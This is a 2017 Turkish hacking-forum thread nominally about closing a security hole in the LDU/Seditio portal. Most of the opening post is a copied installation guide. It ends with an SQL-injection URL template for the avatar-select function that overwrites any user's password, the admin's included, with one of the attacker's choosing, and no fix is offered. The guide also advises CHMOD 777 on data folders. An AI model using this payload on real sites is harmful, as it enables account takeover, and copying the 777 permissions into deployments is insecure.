THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Seditio portalda güvenlik açığı kapatmak --Rolls---

Rolls - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Tekirdağ
Mesajlar:
400
Konular:
31
Teşekkür (Etti):
345
Teşekkür (Aldı):
109
Ticaret:
(0) %
24-04-2017 17:59
#1
Seditio portalda güvenlik açığı kapatmak --Rolls---
Selamun Aleyküm
THT Ailesi

----------------------------------------


Ldu ve Seditio Hack Açıklar Açıkları Acıkları Acıklar Injection


LDU KURULUMU

1 : INDIRME >> En son LDU paketini indiriniz.

Son paketi SADECE neocrome.net adresinden indiriniz.
Baska bir siteden indirilmesi yasadisidir ve güvensizdir.



2 : AYARLAR >> Ayar dosyasini düzenleyiniz.

datas/config.php dosyasini açiniz ve e-posta site basligi ve benzeri parametreleri isteginiz dogrultusunda düzenleyiniz. Bununla birlikte MySQL ayarlarini veritabani bilgilerinize göre ekleyiniz. Anlamadiginiz bir ayari degistirmeyiniz .

Kod:
$cfg[’mysqlhost’] = ’localhost’; // Veritabani Sunucu Baglantisi $cfg[’mysqluser’] = ’root’; // Veritabani Kullanici Adi $cfg[’mysqlpassword’] = ’’; // Veritabano Parolasi $cfg[’mysqldb’] = ’test’; // Veritabani Adi $cfg[’adminemail’] = ’admin@mysite.com’; // Yönetici e-posta adresi $cfg[’maintitle’] = ’MainTitleHere’; // Ana site basligi $cfg[’subtitle’] = ’SubtitleHere’; // Seçenege bagli alt baslik $cfg[’mainurl’] = ’http://www.mydomain.com’; // Sonunda slash olmayacak ! $cfg[’defaultskin’] = ’cranberry’; // Geçerli Deri $cfg[’defaultlang’] = ’tr’; // Geçerli Dil

3 : SUNUCUYA AKTARMA >> Dosyalari sunucuya aktariniz.

Tüm deri klasörlerini aktarmaniz gerekmiyor. Sistemin çalismasi için birinin aktarilmasi yeterli.
Geçerli deri klasörü /datas/config.php içinde olacaktir. ilk çagrilan deri bu olacagi için aktardiginiz tek dizinin bu oldugundan emin olmalisiniz veya aktardiginiz dizinin ismine göre ikinci adima geri dönmelisiniz.
docs/ dizinini aktarmaniza gerek yoktur. Burada LDU sistemini kullanan sizler için bilgiler yer alir.



4 : CHMOD AYARLARI >> Sunucunuz için yazma okuma ayarlarini belirleyiniz.

Kod:
datas/avatars/ datas/thumbs/ datas/tmp/ datas/users/
dizinlerine ’CHMOD 777’ uygulayiniz:
CHMOD-bir dizini 777 yapmak o dizine yazma okuma erisim haklarini tamamen açmaktir. FTP yaziliminizda bir komut satiri veya CHMOD seçeneginin bulundugu bir arabirim ile ayar yaparsiniz. (Bu genelde sag tik oluyor).



5 : MySQL VERITABANINI OLUSTURMAK >> MySQL Veritabanini olusturunuz.

MySQL’e uzaktan baglanti araciniza baglaniniz. (Genelde PHPmyAdmin).
Veritabaninizi seçin, "SQL" baglantisina tiklayin, ardindan ’Gözat’a tiklayip docs/ldu-createnew-700.sql dosyasini seçin ve uygulatin, bu gerekli tablolari olusturacaktir.



6 : ILK ÇALISTIRMA >> Kendinize bir yönetici hesabi olusturun.

Ana sayfa baglantinizi bir tarayici yardimiyla açin ve önce ’baglan’ ardindan ’kayit ol’ baglantilarini kullanarak kendinize bir hesap olusturun.


7 : ServerOp HESABI

Sisteme ilk kayit olan kullanici otomatik olarak 99 (ServerOp) olarak atanir ve hesap aktiflestirilir. Eger üye onayi için aktiflestirme mesajlarini almiyorsaniz sunucunuz e-posta göndermek için düzgün yapilandirilmamis demektir. Bu durumda manuel olarak users tablosundan user_active sekmesini 1 yaparak kullaniciyi aktiflestirebilirsiniz. Eger bir akilli çikip tam siz islem yaparken arada kayit olmayi basarirsa users tablosunu tamamen silip yeniden kayit olmayi deneyin.


8 : Gelismis Eklentilerin Yüklenmesi

Baglanti tamamlandiktan sonra Gelismis Eklentiler baglantisini tiklayiniz, ardindan tercihlerinize göre ister tek tek ister tümünü yükle seçenekleri ile eklenti yükleme islemlerini tamamlayiniz.


9 : Son

Kurulum islemi simdi basariyla tamamlanmis olmali.

Not: Eger basaramadiysaniz derin bir nefes alin ve en basa dönüp adimlari dikkatlice yeniden uygulayin. Tekrar çalismazsa LDU Türkçe forumuna gelip karsilastiginiz sorunu arayin. Muhtemelen çogu durumla daha önceden karsilasilmistir bu yüzden öncelikle aramaya inanin ve arayin.


Problemin daha önce islenmedigine emin oldugunuzda sorununuzu anlatan bir baslik ve çalistiginiz sistemle ilgili bilgiler içeren bir mesaj ile probleminizi LDU Türkçe forumuna yaziniz. Mutlaka web sitenizi sol kisima yaziniz bu sitenizi inceleyen yardimcilarin problemi dogrudan görmesine olanak saglayacaktir.


Kurulum Ek Sorun Çözümleri

Durum: Türkçe karakterler düzgün görüntülenmiyor.
Çözüm: Yönetim Merkezi / Ayarlar / Seçenekler - HTML karakter setini Turkish-ISO-8859-9 olarak belirleyin.

Durum: Ek TXT veya HTML belgeleri sistemden görüntületmek.
Çözüm: datasview dizinine dosyanin atilmasi yeterlidir. ean.htm ’in atilmasi durumunda çikis adresi view.php?v=ean olacaktir.

Durum: PHP kodu eklemek / çalistirmak istiyorum.
Çözüm: LDU Türkçe Forumundan LDU ip Uçlari sabit konusu altinda plug-in çalistirmayi okuyunuz.

Durum: ’Flood’ korumalarini aktiflestirmek istiyorum.
Çözüm: LDU gelismis koruma araçlarina sahiptir. Yönetim Merkezi / Ayarlar / Site Korumasi bölümünden LDU Shield’i devreye almaniz güvenlik sorunlariniza yeterli bir çözüm olacaktir. Bu sitede de zaman zaman karsilastiginiz gibi etrafta lamerlar yani karin agrisindan baska ise yaramayan insanlar fazlasiyla mevcut. Bunun için en etkili yöntemlerden biri de siteye kullanici aliminda yönetici aktivasyonunu devreye almaktir. Saldirilarin bir kaç saniye içinde bertaraf edilmesi bu sekilde mümkün olmaktadir. 8 saat ugrasan lamercik sizin bir tiklamaniza yenilmis olur.

LDU içerik yönetim sistemi ile esenlikle dolu yarinlar ve fikirleriniz hür bir sekilde insanlara duyurabileceginiz web siteleri olusturmanizi umuyoruz.


Ldu Injection acigi tespit edildi ! ! !


Kod:
users.php?m=profil&a=avatarselect&x=011A99&id=[avatarid]-avatar.gif%[user sql taplo baslangici ]%[user id ],user_password=%[Yapmak istediginiz sifrenin md5] avatar id e seçtigimiz avatari yaziorz.. User sql baslangicina ilk üyenin idi (genelde 1 dir) user id e sifresinji deistirmek istedigimiz kisinin idini en sonada yapmak istedigimiz sifreyi md5 olarak giriyoruz

--------------------------------
-------------------------
-------------------
------------
---------

Allah'a emanet olunuz.

Rolls

---------------------
• Bu dünyada herkes birçok şeyin cahilidir. Yeter ki kendi işinin cahili olmasın. •

Ϲ⋆
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.283
Konular:
319
Teşekkür (Etti):
513
Teşekkür (Aldı):
1315
Ticaret:
(0) %
24-04-2017 18:00
#2
Birşey anlamasam da elinize sağlık hocam
Şakası bir yana güzel konu olmuş.
Rolls - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Tekirdağ
Mesajlar:
400
Konular:
31
Teşekkür (Etti):
345
Teşekkür (Aldı):
109
Ticaret:
(0) %
01-05-2017 17:11
#3
Alıntı:
MyGf´isimli üyeden Alıntı Mesajı göster
Birşey anlamasam da elinize sağlık hocam
Şakası bir yana güzel konu olmuş.
Faydasını gören olacaktır emin ol. Teşekkür ederim
---------------------
• Bu dünyada herkes birçok şeyin cahilidir. Yeter ki kendi işinin cahili olmasın. •

Ϲ⋆
sevban035 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
kaf
Mesajlar:
687
Konular:
67
Teşekkür (Etti):
189
Teşekkür (Aldı):
146
Ticaret:
(0) %
02-05-2017 22:35
#4
hocam biraz kısa özet anlatım yapmadan direk uygulamaya girmek sıkıntılı değilmi ? teşekkürler..
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.316
Konular:
68
Teşekkür (Etti):
10
Teşekkür (Aldı):
358
Ticaret:
(0) %
02-05-2017 22:39
#5
eline saglık
--------------------- 10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler